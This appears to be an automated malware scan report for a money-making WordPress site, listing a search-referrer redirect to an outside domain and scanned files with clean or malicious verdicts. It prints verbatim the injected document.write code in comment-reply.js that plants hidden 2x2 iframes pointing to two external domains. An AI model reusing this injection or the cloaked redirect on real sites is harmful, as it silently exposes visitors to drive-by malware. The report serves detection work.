Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://freecashsecretsonline.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: freecashsecretsonline.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 26 Apr 2014 01:20:04 GMT Location: http://vcminden.de/mzmd.html?h=575374 Server: nginx/1.6.0 Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://freecashsecretsonline.com/ | 200 OK Content-Length: 32621 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(String.fromCharCode(10,60,33,45,45,32,65,76,76,32,65,68,83,69,78,83,69,32,65,68,83,32,68,73,83,65,66,76,69,68,32,45,45,62,10,60,112,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,102,114,101,101,99,97,115,104,115,101,99,114,101,116,115,111,110,108,105,110,101,46,99,111,109,47,119,112,45,99,111,110,116,101,110,116,47 ...[9814 bytes skipped]... Decoded script: <!-- ALL ADSENSE ADS DISABLED --> <p style="text-align: center;"><a href="http://freecashsecretsonline.com/wp-content/uploads/2011/10/freecashsecrets2.png"><img class="aligncenter size-medium wp-image-220" title="freecashsecrets2" src="http://freecashsecretsonline.com/wp-content/uploads/2011/10/freecashsecrets2-300x150.png" alt="" width="300" height="150" /></a></p> <p><center><iframe width="560" height="315" src="http://www.youtube.com/embed/qGKfR_3GlPI?rel=0" frameborder="0" allowfullscreen></iframe></center></p> <div style="text-align: center;"><strong>You are going to learn one of the most powerful</strong><br /> <strong>and easiest ways of making money. FULL STOP Period.</strong></div> <div style="text-align: center;">The fastest known wa ...[2495 bytes skipped]... | ||
http://freecashsecretsonline.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/wp-content/plugins/downloads-box/mydownloadsbox_frontend.js?ver=3.4.1 | 200 OK Content-Length: 399 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/wp-includes/js/comment-reply.js?ver=3.4.1 | 200 OK Content-Length: 1098 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=575374></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turknet24.com/oamd.html?j=575374></iframe>'); addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=575374 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=575374> Hidden iFrame found. size: 2x2 src: http://turknet24.com/oamd.html?j=575374 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turknet24.com/oamd.html?j=575374> | ||
http://freecashsecretsonline.com/wp-admin/js/password-strength-meter.js?ver=3.4.1 | 200 OK Content-Length: 374 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/wp-content/plugins/s2member/s2member-o.php?ws_plugin__s2member_js_w_globals=1&qcABC=1&ver=111017-3204694224 | 200 OK Content-Length: 20548 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21987 Content-Type: text/javascript | clean |
http://toolbar.cdn.gigya.com/v2/toolbar.js | 200 OK Content-Length: 30552 Content-Type: application/x-javascript | clean |
http://freecashsecretsonline.com/wp-content/plugins/visitor-country/visitor-country.js?ver=3.4.1 | 200 OK Content-Length: 89 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/contact | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://freecashsecretsonline.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://freecashsecretsonline.com/members-area | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://freecashsecretsonline.com/special-offers | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=freecashsecretsonline.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://freecashsecretsonline.com/
Result: freecashsecretsonline.com is not infected or malware details are not published yet.
Result: freecashsecretsonline.com is not infected or malware details are not published yet.